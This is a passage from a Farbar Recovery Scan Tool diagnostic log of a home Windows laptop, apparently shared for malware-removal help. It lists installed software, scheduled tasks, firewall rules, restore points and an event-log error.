    Imperial Island: Birth of an Empire (x32 Version: 3.0.2.59 - WildTangent) Hidden
    Intel® Chipset Device Software (x32 Version: 10.1.1.9 - Intel® Corporation) Hidden
    Intel® Dynamic Platform and Thermal Framework (HKLM-x32\...\{654EE65D-FAA4-4EA6-8C07-DC94E6A304D4}) (Version: 8.1.10608.329 - Intel Corporation)
    Intel® Management Engine Components (HKLM\...\{1CEAC85D-2590-4760-800F-8DE5E91F3700}) (Version: 11.0.2.1183 - Intel Corporation)
    Intel® PRO/Wireless Driver (HKLM\...\{edcc2d98-dba0-4914-ba46-6dae7352cea9}) (Version: 19.20.0000.5007 - Intel Corporation)
    Intel® Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 20.19.15.4454 - Intel Corporation)
    Intel® Rapid Storage Technology (HKLM\...\{409CB30E-E457-4008-9B1A-ED1B9EA21140}) (Version: 14.8.0.1042 - Intel Corporation)
    Intel® WiDi (HKLM\...\{6B15F1EF-F3A8-4C29-BF9E-18EB3683A83D}) (Version: 6.0.60.0 - Intel Corporation)
    Intel® WiDi Software Asset Manager (x32 Version: 3.2.1184 - Intel Corporation) Hidden
    Intel® Wireless Bluetooth® (HKLM-x32\...\{3920BCB0-23AA-4D0D-93E5-404692DAF9D2}) (Version: 19.00.1621.3340 - Intel Corporation)
    Intel® PROSet/Wireless Software (HKLM-x32\...\{d5572863-793c-4ec8-872a-43cccc68b948}) (Version: 18.40.0 - Intel Corporation)
    Jewel Match Snowscapes (x32 Version: 3.0.2.118 - WildTangent) Hidden
    Little Boy: Walter's Scooter (x32 Version: 3.0.2.59 - WildTangent) Hidden
    Lost Souls: Timeless Fables Collector's Edition (x32 Version: 3.0.2.59 - WildTangent) Hidden
    Magic Heroes: Save Our Park (x32 Version: 3.0.2.59 - WildTangent) Hidden
    Malwarebytes version 3.0.6.1469 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 3.0.6.1469 - Malwarebytes)
    Manor Memoirs Collector's Edition (x32 Version: 3.0.2.59 - WildTangent) Hidden
    Microsoft Office 365 - en-us (HKLM\...\O365HomePremRetail - en-us) (Version: 16.0.7571.2109 - Microsoft Corporation)
    Microsoft Office Home and Student 2010 (HKLM\...\Office14.SingleImage) (Version: 14.0.7015.1000 - Microsoft Corporation)
    Microsoft OneDrive (HKU\S-1-5-21-2731509489-3924948741-1415746157-1001\...\OneDriveSetup.exe) (Version: 17.3.6743.1212 - Microsoft Corporation)
    Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
    Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
    Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
    Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
    Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
    Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
    Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
    Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
    Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
    Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
    Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
    Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
    Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
    Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
    Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
    Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.23918 (HKLM-x32\...\{dab68466-3a7d-41a8-a5cf-415e3ff8ef71}) (Version: 14.0.23918.0 - Microsoft Corporation)
    Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.23918 (HKLM-x32\...\{2e085fd2-a3e4-4b39-8e10-6b8d35f55244}) (Version: 14.0.23918.0 - Microsoft Corporation)
    Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation)
    Office 16 Click-to-Run Extensibility Component (x32 Version: 16.0.7571.2109 - Microsoft Corporation) Hidden
    Office 16 Click-to-Run Extensibility Component 64-bit Registration (Version: 16.0.7571.2109 - Microsoft Corporation) Hidden
    Office 16 Click-to-Run Licensing Component (Version: 16.0.7571.2109 - Microsoft Corporation) Hidden
    Office 16 Click-to-Run Localization Component (x32 Version: 16.0.7571.2109 - Microsoft Corporation) Hidden
    Online Plug-in (x32 Version: 14.5.0.10018 - Citrix Systems, Inc.) Hidden
    Plagiarii (x32 Version: 3.0.2.59 - WildTangent) Hidden
    Polar Bowler 1st Frame (x32 Version: 3.0.2.59 - WildTangent) Hidden
    PuppetShow: Return to Joyville (x32 Version: 3.0.2.126 - WildTangent) Hidden
    Pyro Jump (x32 Version: 3.0.2.59 - WildTangent) Hidden
    Realtek Card Reader (HKLM-x32\...\{5BC2B5AB-80DE-4E83-B8CF-426902051D0A}) (Version: 10.0.10586.21287 - Realtek Semiconduct Corp.)
    Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 10.6.1001.2015 - Realtek)
    Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.8004 - Realtek Semiconductor Corp.)
    Regency Solitaire (x32 Version: 3.0.2.126 - WildTangent) Hidden
    Runefall (x32 Version: 3.0.2.126 - WildTangent) Hidden
    Rush Hour! Gas Station (x32 Version: 3.0.2.59 - WildTangent) Hidden
    Self-service Plug-in (x32 Version: 4.5.0.14155 - Citrix Systems, Inc.) Hidden
    Service Pack 2 for Microsoft Office 2010 (KB2687455) 64-Bit Edition (HKLM\...\{90140000-003D-0000-1000-0000000FF1CE}_Office14.SingleImage_{A3364707-2F53-4C83-8F68-C9877A9080C7}) (Version:  - Microsoft)
    Service Pack 2 for Microsoft Office 2010 (KB2687455) 64-Bit Edition (Version:  - Microsoft) Hidden
    Sky High Farm (x32 Version: 3.0.2.59 - WildTangent) Hidden
    Skype™ 7.31 (HKLM-x32\...\{FC965A47-4839-40CA-B618-18F486F042C6}) (Version: 7.31.104 - Skype Technologies S.A.)
    swMSM (x32 Version: 12.0.0.1 - Adobe Systems, Inc) Hidden
    Synaptics ClickPad Driver (HKLM\...\SynTPDeinstKey) (Version: 19.3.11.37 - Synaptics Incorporated)
    Tasty Blue (x32 Version: 3.0.2.59 - WildTangent) Hidden
    The Far Kingdoms (x32 Version: 1.1.2.4 - WildTangent) Hidden
    TurboTax 2016 (HKLM-x32\...\TurboTax 2016) (Version: 2016.0 - Intuit, Inc)
    Update Installer for WildTangent Games App (x32 Version:  - WildTangent) Hidden
    UserTesting (HKU\S-1-5-21-2731509489-3924948741-1415746157-1001\...\UserTestingPlugin) (Version:  - UserTesting.com)
    VLC media player (HKLM-x32\...\VLC media player) (Version: 2.2.4 - VideoLAN)
    WildTangent Games (HKLM-x32\...\WildTangent wildgames Master Uninstall) (Version: 1.1.0.28 - WildTangent)
    WildTangent Games App for HP (x32 Version: 4.1.1.2 - WildTangent) Hidden
     
    ==================== Custom CLSID (Whitelisted): ==========================
     
    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
     
    CustomCLSID: HKU\S-1-5-21-2731509489-3924948741-1415746157-1001_Classes\CLSID\{0E270DAA-1BE6-48F2-AC49-CF295C30B57B}\InprocServer32 -> %%systemroot%%\system32\shell32.dll => No File
    CustomCLSID: HKU\S-1-5-21-2731509489-3924948741-1415746157-1001_Classes\CLSID\{e8c77137-e224-5791-b6e9-ff0305797a13}\InprocServer32 -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll (Adobe Systems)
     
    ==================== Scheduled Tasks (Whitelisted) =============
     
    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
     
    Task: {00DA6CEA-186D-4563-AC42-5D9024D5EE93} - System32\Tasks\DropboxUpdateTaskMachineUA => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [2016-11-04] (Dropbox, Inc.)
    Task: {020EC6C1-8FC5-4E00-8AA3-DEEFEF76BC4F} - System32\Tasks\IUM-F1E24CA0-B63E-4F13-A9E3-4ADE3BFF3473 => C:\Program Files (x86)\Intel\Intel® Update Manager\bin\iumsvc.exe
    Task: {02741E5B-6CB0-4785-8138-B76C8FFECD36} - System32\Tasks\AdobeAAMUpdater-1.0-LAPTOP-Q6I7UJ7H-Joseph => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [2016-07-01] (Adobe Systems Incorporated)
    Task: {037E6CC1-F2A7-4570-94C3-34EFFF7FEF81} - System32\Tasks\HPCeeScheduleForJoseph => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe [2016-01-22] (Hewlett-Packard)
    Task: {0D314300-9FF5-4A1E-8A6E-02DAC03B2F5A} - System32\Tasks\Microsoft\Office\Office Automatic Updates => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [2016-12-28] (Microsoft Corporation)
    Task: {28815AC6-2D9D-4DB2-9B9B-C15782F58F17} - System32\Tasks\IntelWiDi-Upgrade-91ba0caa-28a7-4f47-8d08-f71b4b10fbec => C:\Program Files (x86)\Intel Corporation\Intel WiDi\Intel® Software Asset Manager\bin\IntelSoftwareAssetManagerService.exe [2015-09-17] (Intel Corporation)
    Task: {2B726BAB-E9B6-4B18-A788-E1550EBC27D3} - System32\Tasks\HPCustParticipation HP Photosmart 6520 series => C:\Program Files\HP\HP Photosmart 6520 series\Bin\HPCustPartic.exe [2012-10-17] (Hewlett-Packard Co.)
    Task: {2CA50760-ECC6-4AE8-ABC0-7786D4ABD805} - System32\Tasks\Bitdefender Agent WatchDog_65D6944A0EF74FDAB96E31112AD39864 => C:\Program Files\Bitdefender Agent\WatchDog.exe [2016-10-21] (Bitdefender)
    Task: {31E6B1DE-6E6C-4EC4-BF0D-F5B3822B798F} - \OfficeSoftwareProtectionPlatform\SvcRestartTask -> No File <==== ATTENTION
    Task: {334761BD-5E77-4258-B1B3-3EBE4E9225C0} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Report => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSFReport.exe [2016-12-21] (HP Inc.)
    Task: {49F9DD57-0D8B-44AC-B3D2-0E9318CE1D6F} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [2016-12-28] (Microsoft Corporation)
    Task: {4A95B853-DC77-486C-853C-03F94CAE8DE7} - System32\Tasks\Intel\Intel Telemetry 2 => C:\Program Files\Intel\Telemetry 2.0\lrio.exe [2015-06-05] (Intel Corporation)
    Task: {56B055C5-6236-4075-A0A4-E2627BB3183B} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2016-09-22] (Google Inc.)
    Task: {5C39963E-E07B-4DD3-BE48-6B43D7E7C731} - System32\Tasks\Hewlett-Packard\HP Support Assistant\PC Health Analysis => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2016-12-07] (HP Inc.)
    Task: {5F53EEE8-4920-4181-806B-2DE65B82BAD7} - System32\Tasks\{832C82D8-6868-4CD7-AF1B-10388CE0E534} => Chrome.exe hxxp://ui.skype.com/ui/0/7.27.0.101/en/abandoninstall?source=lightinstaller&amp;page=tsInstall
    Task: {6EEBD8FF-375F-4F22-AA35-1697FE268304} - System32\Tasks\HP\HP CoolSense\HP CoolSense Start at Logon => C:\Program Files (x86)\HP\HP CoolSense\CoolSense.exe [2016-01-21] (HP Development Company, L.P.)
    Task: {794EC38E-0A13-4104-86A7-8F27C70DA1BB} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Assistant Quick Start => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2016-12-07] (HP Inc.)
    Task: {7A53628B-0D5A-4368-AD0B-4DF307943007} - System32\Tasks\Hewlett-Packard\HP Support Assistant\WarrantyChecker => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPWarrantyCheck\HPWarrantyChecker.exe [2017-01-09] (HP Inc.)
    Task: {891256ED-2188-45B6-9656-46B60828F7EB} - System32\Tasks\OneDrive Standalone Update Task => C:\Users\Joseph\AppData\Local\Microsoft\OneDrive\17.3.6517.0809\OneDriveStandaloneUpdater.exe
    Task: {89D2A8B6-4765-4DCA-85AD-7596FECFB286} - System32\Tasks\Hewlett-Packard\HP Support Assistant\WarrantyChecker_DeviceScan => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPWarrantyCheck\HPWarrantyChecker.exe [2017-01-09] (HP Inc.)
    Task: {8EBEC732-67C6-4823-8F6D-D49219079BB5} - System32\Tasks\DropboxUpdateTaskMachineCore => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [2016-11-04] (Dropbox, Inc.)
    Task: {963EEFD3-C066-4DFC-B419-A76DB6073FFB} - System32\Tasks\Bitdefender AgentTask_AD394AE64E874073B10A89FEEC305A3C => C:\Program Files\Bitdefender\Bitdefender 2017\bdagent.exe [2017-01-03] (Bitdefender)
    Task: {9F965779-1CB2-4D42-BC03-7B29DC26B7B7} - System32\Tasks\Hewlett-Packard\HP Support Assistant\WarrantyChecker_TH45U581RP => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPWarrantyCheck\HPWarrantyChecker.exe [2017-01-09] (HP Inc.)
    Task: {A6F5043F-81F4-4E57-B0B6-BF0997939F31} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2016-09-22] (Google Inc.)
    Task: {AE327D73-DB64-440F-9FF4-02DC16AA63C0} - System32\Tasks\Hewlett-Packard\HP Active Health\HP Active Health Scan (HPSA) => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPActiveHealth\ActiveHealth.exe [2016-11-07] (HP Inc.)
    Task: {B25BDC00-270D-45CD-8FF5-1E12386E6D52} - System32\Tasks\HPDAS => C:\Program [Argument = Files\HP\HP ePrint\HP.DeliveryAndStatus.Desktop.App.exe /CheckJobs]
    Task: {B787AC15-AED2-454D-A6A1-3EDF53CA38BA} - System32\Tasks\IntelWiDi-Upgrade-91ba0caa-28a7-4f47-8d08-f71b4b10fbec-Logon => C:\Program Files (x86)\Intel Corporation\Intel WiDi\Intel® Software Asset Manager\bin\IntelSoftwareAssetManagerService.exe [2015-09-17] (Intel Corporation)
    Task: {BB173364-607B-493A-935B-E5D7832968E5} - System32\Tasks\AVAST Software\Avast settings backup => C:\Program Files\Common Files\AV\avast! Antivirus\backup.exe [2017-01-28] (AVAST Software)
    Task: {E5AF5C26-359C-43CC-BF3F-29807CD26CDD} - System32\Tasks\DropboxOEM => C:\Program Files (x86)\Dropbox\DropboxOEM\DropboxOEM.exe [2016-04-04] ()
    Task: {EF0F5F72-921B-416D-89FD-4102E543E277} - System32\Tasks\Hewlett-Packard\HP Support Assistant\Product Configurator => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\ProductConfig.exe [2016-12-15] (HP Inc.)
    Task: {F3EA5147-1530-4527-9731-26F30F8AE0E1} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Updater => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSSFUpdater.exe [2016-12-07] (HP Inc.)
    Task: {F4CC15E9-94C3-43C0-A478-E0AE034F0175} - System32\Tasks\Intel PTT EK Recertification => C:\Program Files\Intel\iCLS Client\IntelPTTEKRecertification.exe [2016-01-14] (Intel® Corporation)
     
    (If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
     
    Task: C:\WINDOWS\Tasks\DropboxUpdateTaskMachineCore.job => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe
    Task: C:\WINDOWS\Tasks\DropboxUpdateTaskMachineUA.job => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe
    Task: C:\WINDOWS\Tasks\HPCeeScheduleForJoseph.job => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe
     
    ==================== Shortcuts =============================
     
    (The entries could be listed to be restored or removed.)
     
    ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Priceline.com.lnk -> C:\Program Files (x86)\HP\Shared\WizLink.exe () -> hxxp://www.priceline.com/?refid=PLHBC6240OPQ&refclickid=square
     
    ==================== Loaded Modules (Whitelisted) ==============
     
    2016-07-16 06:42 - 2016-07-16 06:42 - 00231424 _____ () C:\WINDOWS\SYSTEM32\ism32k.dll
    2016-12-13 20:34 - 2016-12-09 05:29 - 02681200 _____ () C:\WINDOWS\system32\CoreUIComponents.dll
    2017-02-01 08:44 - 2013-09-03 14:29 - 00111832 _____ () C:\Program Files\Bitdefender\Bitdefender 2017\bdmetrics.dll
    2017-02-01 08:44 - 2016-11-14 16:52 - 01008448 _____ () C:\Program Files\Bitdefender\Bitdefender 2017\otengines_001_001\ashttpbr.mdl
    2017-02-01 08:44 - 2016-11-14 16:52 - 00541952 _____ () C:\Program Files\Bitdefender\Bitdefender 2017\otengines_001_001\ashttpdsp.mdl
    2017-02-01 08:44 - 2016-11-14 16:52 - 03202816 _____ () C:\Program Files\Bitdefender\Bitdefender 2017\otengines_001_001\ashttpph.mdl
    2017-02-01 08:44 - 2016-11-14 16:52 - 01542976 _____ () C:\Program Files\Bitdefender\Bitdefender 2017\otengines_001_001\ashttprbl.mdl
    2016-08-06 14:07 - 2014-04-14 20:59 - 00389896 _____ () C:\Program Files\CyberLink\Shared files\RichVideo64.exe
    2017-01-10 17:37 - 2017-01-20 07:47 - 02264352 _____ () C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\PoliciesControllerImpl.dll
    2016-12-13 20:34 - 2016-12-09 05:29 - 02681200 _____ () C:\WINDOWS\SYSTEM32\CoreUIComponents.dll
    2016-10-25 09:57 - 2016-10-25 09:57 - 00491184 _____ () C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll
    2016-04-01 13:57 - 2016-12-28 12:03 - 08924864 _____ () C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\1033\GrooveIntlResource.dll
    2017-02-01 08:44 - 2017-01-13 13:51 - 00023328 _____ () C:\Program Files\Bitdefender\Bitdefender 2017\lang\en-us\bdsystray.txtui
    2016-09-29 12:48 - 2016-09-29 12:48 - 00134656 _____ () C:\Windows\ShellExperiences\Windows.UI.Shell.SharedUtilities.dll
    2017-01-10 22:47 - 2016-12-21 02:09 - 00474112 _____ () C:\Windows\ShellExperiences\QuickActions.dll
    2017-01-10 22:45 - 2016-12-21 01:54 - 09760768 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll
    2017-01-10 22:45 - 2016-12-21 01:48 - 01401856 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
    2017-01-10 22:45 - 2016-12-21 01:48 - 00757248 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CSGSuggestLib.dll
    2017-01-10 22:45 - 2016-12-21 01:48 - 01033216 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Actions.dll
    2017-01-10 22:45 - 2016-12-21 01:48 - 02424320 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll
    2017-01-10 22:46 - 2016-12-21 01:53 - 04853760 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll
    2017-02-01 16:54 - 2017-02-01 17:01 - 03988944 _____ () C:\Users\Joseph\Downloads\AdwCleaner.exe
    2017-01-24 21:46 - 2017-01-24 21:46 - 03865600 _____ () C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1701.10102.0_x64__8wekyb3d8bbwe\Calculator.exe
    2016-12-09 16:55 - 2016-12-08 03:03 - 02412888 _____ () C:\Program Files (x86)\Google\Chrome\Application\55.0.2883.87\libglesv2.dll
    2016-12-09 16:55 - 2016-12-08 03:03 - 00099672 _____ () C:\Program Files (x86)\Google\Chrome\Application\55.0.2883.87\libegl.dll
     
    ==================== Alternate Data Streams (Whitelisted) =========
     
    (If an entry is included in the fixlist, only the ADS will be removed.)
     
    AlternateDataStreams: C:\Users\Joseph\Downloads\AdwCleaner.exe:BDU [0]
    AlternateDataStreams: C:\Users\Joseph\Downloads\FRST64.exe:BDU [0]
    AlternateDataStreams: C:\Users\Joseph\Downloads\JRT (1).exe:BDU [0]
    AlternateDataStreams: C:\Users\Joseph\Downloads\JRT.exe:BDU [0]
     
    ==================== Safe Mode (Whitelisted) ===================
     
    (If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
     
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\mcpltsvc => ""="Service"
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\McMPFSvc => ""="Service"
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mcpltsvc => ""="Service"
     
    ==================== Association (Whitelisted) ===============
     
    (If an entry is included in the fixlist, the registry item will be restored to default or removed.)
     
     
    ==================== Internet Explorer trusted/restricted ===============
     
    (If an entry is included in the fixlist, it will be removed from the registry.)
     
     
    ==================== Hosts content: ===============================
     
    (If needed Hosts: directive could be included in the fixlist to reset Hosts.)
     
    2015-10-30 02:24 - 2017-02-01 17:10 - 00000824 ____A C:\WINDOWS\system32\Drivers\etc\hosts
     
     
    ==================== Other Areas ============================
     
    (Currently there is no automatic fix for this section.)
     
    HKU\S-1-5-21-2731509489-3924948741-1415746157-1001\Control Panel\Desktop\\Wallpaper -> C:\windows\web\wallpaper\Hewlett-Packard Backgrounds\backgroundDefault.jpg
    DNS Servers: 192.168.1.1
    HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
    Windows Firewall is enabled.
     
    ==================== MSCONFIG/TASK MANAGER disabled items ==
     
     
    ==================== FirewallRules (Whitelisted) ===============
     
    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
     
    FirewallRules: [vm-monitoring-nb-session] => LPort=139
    FirewallRules: [{0308E923-8487-403F-B445-D15ED8CCCB95}] => C:\Program Files (x86)\CyberLink\PowerDVD14\Movie\PowerDVD Cinema\PowerDVDCinema.exe
    FirewallRules: [{E42A29D0-C19D-4D1C-8FE2-D850981AEBA8}] => C:\Program Files (x86)\CyberLink\PowerDVD14\Movie\PowerDVDMovie.exe
    FirewallRules: [{29F940E0-B1B5-45D6-9E75-4BECF8FB67FC}] => C:\Program Files (x86)\CyberLink\PowerDVD14\PowerDVD14Agent.exe
    FirewallRules: [{B3262CE0-7120-40CC-B8E9-77C75A53DBCA}] => C:\Program Files (x86)\CyberLink\PowerDVD14\Kernel\DMS\CLMSServerPDVD14.exe
    FirewallRules: [{F580D45B-9B87-4478-9D02-4FB5710B4EE2}] => C:\Program Files (x86)\CyberLink\PowerDVD14\PowerDVD.exe
    FirewallRules: [{6C97C639-83FE-4D5D-A976-D178E54ACEBA}] => C:\Program Files (x86)\Skype\Phone\Skype.exe
    FirewallRules: [{D49EDF57-C52E-467F-A056-63D5BD0738D7}] => C:\Program Files\Intel Corporation\Intel WiDi\SmartAgentTest.exe
    FirewallRules: [{261EA2B7-45BC-4067-83D5-2418ADCEE9C8}] => C:\Program Files\Intel Corporation\Intel WiDi\Next\WirelessDisplay.exe
    FirewallRules: [{B59EE6A4-D725-4298-9685-DFD41B59B982}] => C:\Program Files\Intel Corporation\Intel WiDi\WiDiAppOld.exe
    FirewallRules: [{CF4CA95C-09CF-4959-9D76-68426CDA477D}] => C:\Program Files\Intel Corporation\Intel WiDi\WiDiApp.exe
    FirewallRules: [{080A3C37-1740-4E2C-815C-189C744E6E60}] => c:\Program Files\CyberLink\PowerDirector12\PDR10.EXE
    FirewallRules: [{A9134569-28FB-4867-B6F4-AA1D2E5E15EE}] => C:\Program Files (x86)\Bonjour\mDNSResponder.exe
    FirewallRules: [{0334F46F-ABB7-4487-AA0B-5C39528FE3FC}] => C:\Program Files (x86)\Bonjour\mDNSResponder.exe
    FirewallRules: [{A0CD17AF-60E5-44AE-AC27-9328A673AC89}] => C:\Program Files\Bonjour\mDNSResponder.exe
    FirewallRules: [{970594D0-4429-4C70-838A-D147ED3FC01F}] => C:\Program Files\Bonjour\mDNSResponder.exe
    FirewallRules: [{DBA71186-0545-49C3-8B27-EF841C1940ED}] => C:\Program Files (x86)\Microsoft Office\root\Office16\outlook.exe
    FirewallRules: [{EA52B792-A898-4EF8-AD47-E12D2BF5BD0A}] => C:\Program Files\HP\HP Photosmart 6520 series\Bin\DeviceSetup.exe
    FirewallRules: [{A89935E6-6E46-4459-BA52-726242012FAF}] => C:\Program Files\HP\HP Photosmart 6520 series\Bin\HPNetworkCommunicator.exe
    FirewallRules: [{2C60681B-0038-4452-ADDE-3FC15C74708A}] => C:\Program Files\HP\HP Photosmart 6520 series\Bin\HPNetworkCommunicatorCom.exe
    FirewallRules: [{0790D2E9-EA09-4D41-BA01-B8BC78ECD5DA}] => C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    FirewallRules: [{DDE9F5AC-0598-494C-89AB-659FD2D18BBB}] => C:\Program Files\Intel\WiFi\bin\PanDhcpDns.exe
    FirewallRules: [{C5ABB8F3-9C6A-48E2-9E61-D7DFAF7B05F7}] => C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdater.exe
    FirewallRules: [{D4F608B2-F97B-4617-8A32-8CEA999C5E3D}] => C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
    FirewallRules: [{C23C9D12-7310-4478-8E06-5C73C5D2AC72}] => C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
    FirewallRules: [{F04FC8DC-884B-4DD1-8B0B-79F29AED26C0}] => C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
    FirewallRules: [{009CC8D2-7203-4597-901D-185455F173D9}] => C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
    FirewallRules: [{5151A207-2082-465F-96EB-697F284CEFD2}] => C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
     
    ==================== Restore Points =========================
     
    15-01-2017 15:43:24 Installed TurboTax 2016 wrapper
    24-01-2017 15:52:44 Scheduled Checkpoint
    31-01-2017 20:53:13 end January 2017
    01-02-2017 17:15:49 JRT Pre-Junkware Removal
    01-02-2017 17:24:34 JRT Pre-Junkware Removal
     
    ==================== Faulty Device Manager Devices =============
     
     
    ==================== Event log errors: =========================
     
    Application errors:
    ==================
    Error: (02/01/2017 05:41:21 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: JOSEPHW)
    Description: Activation of app Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy!App failed with error: -2144927142 See the Microsoft-Windows-TWinUI/Operational log for additional information.
     
